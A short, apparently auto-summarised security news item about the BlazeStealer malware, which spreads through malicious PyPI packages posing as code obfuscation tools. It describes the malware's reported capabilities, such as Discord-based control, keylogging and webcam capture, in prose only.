November 9, 2023 at 06:16PM
Malicious Python packages masquerading as code obfuscation tools are targeting developers through the PyPI code repository. Known as “BlazeStealer,” the malware can steal data, launch keyloggers, encrypt files, and execute commands. Hackers target developers engaged in code obfuscation due to the valuable and sensitive information they work with. BlazeStealer is the latest in a series of compromised Python packages, and it uses Discord as a command and control platform to take control of victims’ computers, including accessing webcams.
From the meeting notes, it is evident that there is a significant concern regarding malicious Python packages disguising themselves as legitimate code obfuscation tools. Researchers at Checkmarx have discovered malware called “BlazeStealer” that specifically targets developers who are interested in code obfuscation. The researchers emphasize that this malware is particularly alarming because it can exfiltrate host data, steal passwords, launch keyloggers, encrypt files, and execute host commands. The choice of targeting developers involved in code obfuscation is strategic, as these individuals may have valuable and sensitive information. Checkmarx has been tracking several other malicious Python packages, such as PyLoose and culturestreak, which have been used for cryptomining and unauthorized cryptocurrency mining respectively.
BlazeStealer works by extracting a malicious script from an external source, providing attackers with complete control over the victim’s computer. It uses Discord messaging service as a command and control channel, allowing the attacker to perform various harmful actions, including gathering host data, downloading files, deactivating Windows Defender and Task Manager, and potentially locking the computer. The malware is also capable of taking control of a PC’s webcam by secretly downloading a .ZIP file and installing a freeware application called WebCamImageSave.exe. This allows the attacker to capture photos using the webcam and send them back to the Discord channel without leaving any trace of its presence.
Overall, the threat posed by BlazeStealer and other similar malicious Python packages is significant, especially for developers involved in code obfuscation. It is crucial for organizations to be aware of these threats and take appropriate measures to protect their systems and sensitive information.